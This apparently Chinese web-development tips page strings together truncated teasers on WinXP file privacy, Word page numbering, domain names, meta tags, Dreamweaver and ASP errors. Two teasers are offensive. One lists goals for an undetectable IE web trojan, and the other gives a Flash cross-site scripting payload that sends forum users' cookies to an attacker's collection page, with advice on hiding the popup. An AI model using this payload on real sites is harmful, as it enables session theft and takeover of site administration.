假设你使用的是WinXP，一般来讲你会把日常所用的工具软件都放到一个名为“Tools”的文件夹中。好的，先容我猜猜，里面都有些什么东东——加密的、图片浏览处理的、压缩/解压缩的、音视频播放的、刻录的、系统优化的……怎么样，猜得八九不离十吧？相信这些Tools平日里一定带来了不少方便，不过如果你仅满足于使用这些“Tools”的一般用途，那笔者就要为WinXP道一声“可惜”——它辛辛苦苦为你准备的百宝箱却被不经意地抛在了一旁。相比常用的工具软件，WinXP所提供工具的特点是整合在系统中，因此使用简单、快捷而方便，那么就随笔者一起掀开这个箱子，看看里面到底都有些什么宝贝吧。
一、文件保密
WinXP有着很好的多用户功能，允许不同用户拥有个性的系统设置。但在这样一个共享环境下，个人的隐私问题又凸现出来，由此涉及到了多用户使用下的文件保密问题。对于这个问题，你可能会考虑诸如“文件保密专家”之类的文件加密软件，其实在WinXP中，大可不必为文件的保密问题操心，因为它为我们提供了多种文件保密的方法。不过在为文件进行保密操作之前，首先要确定待保密的文件是放在NTFS分区上的，这是WinXP里进行文件保密的基础，以下的操作都是在NTFS分区上进行的。
1.个人文件夹的保密
在WinXP里最简单的文件保密方法是对“个人文件夹”的加密。所谓“个人文件夹”是指在“系统盘ocuments and Settings”下，以当前用户名命名的文件夹；其中包含了如“我的文档”、“开始菜单”一类的个人用户文件。对其进行加密，只需直接在其文件夹或其子文件夹的“属性”对话框的“共享”页上，勾选“将这个文件夹设为专用”（若为管理员用户则此处默认为勾选），那么其他用户（包括管理员）都无法访问此文件夹。此方法只适合于对“个人文件夹”的保密，对于系统的其他文件和文件夹则无能为力了。需要注意的是，设为“专用”的个人文件夹将不能被共享，同样，已共享的个人文件夹在取消共享之前也不能被设为“专用”。实际应用中，可将要保密的文件保存到设为专用的“我的文档”里，即可实现文件保密的目的。

查看更多...

大家在使用Word 2000/2002编辑带有目录或者附录的文档时，一定遇到过这样的问题：对正文之前的目录或者前言要插入页码，操作并进行设置后发现，正文中的页码是接着前面的页码从n+1开始的。要是正文后面还有附录或者编后语的话，页码会接着正文的末页往下排列，真是让人头疼啊!

　　由于笔者经常编辑这种文档，所以经过不断摸索和学习，终于利用Word自带的功能解决了这个难题：

　　①当我们写完目录后，执行“插入”→“页码”操作，假设页码从1开始。

查看更多...

1.什么是域名
Internet域名是Internet网络上的一个服务器或一个网络系统的名字，在全世界，没有重复的域名。域名的形式是以若干个英文字母、数字和中横线组成，由"."分隔成几部分，如IBM.COM就是一个域名。.com、.net、.org通称为gTLD（通用顶级域名）.cn、.us称为ccTLD（国家代码顶级域名）。


2.为什么要注册域名

查看更多...

既然要打造完美的ＩＥ网页木马，首先就必须给我们的完美制定一个标准，我个人认为一个完美的ＩＥ网页木马至少应具备下列四项特征：
　　一：可以躲过杀毒软件的追杀；
　　二：可以避开网络防火墙的报警；
　　三：能够适用于多数的ＷＩＮＤＯＷＳ操作系统（主要包括ＷＩＮ９８、ＷＩＮＭＥ、ＷＩＮ２０００、ＷＩＮＸＰ、ＷＩＮ２００３）中的多数ＩＥ版本（主要包括ＩＥ５．０、ＩＥ５．５、ＩＥ６．０），最好能打倒ＳＰ补丁；
　　四：让浏览者不容易发觉ＩＥ变化，即可以悄无声息，从而可以长久不被发现。

查看更多...

解决思路
用HTML方法来控制Flash的播放我们在第三章已经很细致的介绍过了，如果我们学会了其中的思想（用javascript和id属性等等），剩下的仅仅就是方法的函数而已，所以请大家在进行本章学习之前再适当的复习一下第三章的内容。

具体步骤
先要明白一个播放器有哪些基本功能：

查看更多...

前些天一直忙着学习WIN32汇编，一直懒得写文章，这些天来好像Flash跨站攻击闹的挺凶的，但在实施Flash跨站攻击时的那个弹出的IE窗口很容易引起别人的怀疑，而使得Flash跨站攻击失败，这的确让人多少有点头疼，大家是不是也一直在寻找实施Flash跨站攻击时不弹出IE窗口的方法来隐藏自己的攻击行为呢？下面大家和我一起来解决这个不大不小的问题，让Flash跨站攻击更完美吧！
一般来说大家在进行Flash跨站攻击时都是自己做一个Flash动画，并在第一帧中加入用于跳转到其他URL的AtionScript脚本函数，如下：
getURL("BLOCKED SCRIPTwindow.open(’http://用于收集Cookie的网页地址?’+document cookie)","_self") 然后把这个Flash动画置于论坛中的签名、贴子或短信消息中，用来获得管理员或用户的Cookie，从而得到管理权限，进一步伺机控制整个站点,最终达到自己的目的。我们可以看到在整个跨站攻击中最重要的就是这个AtionScript脚本啦！也就是这个脚本中用到的代码打开了一个我们又爱又恨的窗口，所以我们也只能从改造这个脚本代码来实现隐藏或者是去掉弹出的IE窗口，除此外别无它法！
我们先分析一下上面的AtionScript脚本，它使用AtionScript脚本函数"getURL"跳转到一个使用JavaScript协议的URL（JavaScript协议后面就是我们非常熟悉的JavaScript脚本代码），在JavaScript中使用document.cookie的到Cookie，并把Cookie和一个用于收集Cookie的网页地址连成一个http协议的URL地址，最后使用window.open打开合成的URL地址，从而把Cookie用GET方式发送到用于收集Cookie的网页，并记录下来。
通过上面的分析我们进一步了解那个弹出的IE窗口是由于JavaScript协议中的代码window.open所生成的，相信大家都知道window.open的第二个参数用来指定打开的窗口的名字，其通用名称有"_media （IE6.0 在浏览器左边的媒体面板内打开）"、"_blank （在新窗口中打开）"、"_parent （在当前框架的父框架内打开。假如当前框架无父框架，此参数值等同于 _self）"、"_search （IE5.0 在浏览器左边的搜索面板内打开）"、"_self（在当前窗口中打开，覆盖当前文档）"、"_top （在所有框架之外的最顶层窗口中打开 。假如当前窗口无框架结构，此参数值等同于 _self ）"等几种，如果我们以"_search"来打开窗口，不是就没有了弹出的IE窗口了吗？AtionScript脚本改为：

查看更多...

meta是用来在HTML文档中模拟HTTP协议的响应头报文。meta 标签用于网页的<head>与</head>中，meta 标签的用处很多。meta 的属性有两种：name和http-equiv。name属性主要用于描述网页，对应于content（网页内容），以便于搜索引擎机器人查找、分类（目前几乎所有的搜索引擎都使用网上机器人自动查找meta值来给网页分类）。这其中最重要的是description（站点在搜索引擎上的描述）和keywords（分类关键词），所以应该给每页加一个meta值。比较常用的有以下几个：  

一、name 属性  

1、<meta name="Generator" contect="">用以说明生成工具（如Microsoft FrontPage 4.0）等；  

查看更多...

问：打开本地机子上的网页点击上面的Flash按钮准备打开新页面时提示：“macromedia flash player 终止了一项可能不安全的操作”

答：用了JAVA跳出窗口，直接用getURL("网页")则无此问题^_^

查看更多...

问：Dreamweaver如何快速切换到父框架？
答：按住Alt键，用鼠标随便点击一个子框架即可切换到父框架

问：列表/菜单怎么快速添加列表项？
答：按Tab键可以快速添加列表项，比加一个列表项按一次+更方便

查看更多...

如果有过多的connection或者recordset在使用后未被及时关闭并释放，就可能出现这种错误，因而程序员要有良好的编程习惯。
此外，如果您的数据库比较大，内容很多，用asp读取的时候如果并发很多，也可能出现。这个时候就比较难处理了，最好换大支持存储过程的数据库系统上，改用存储过程处理分页。

查看更多...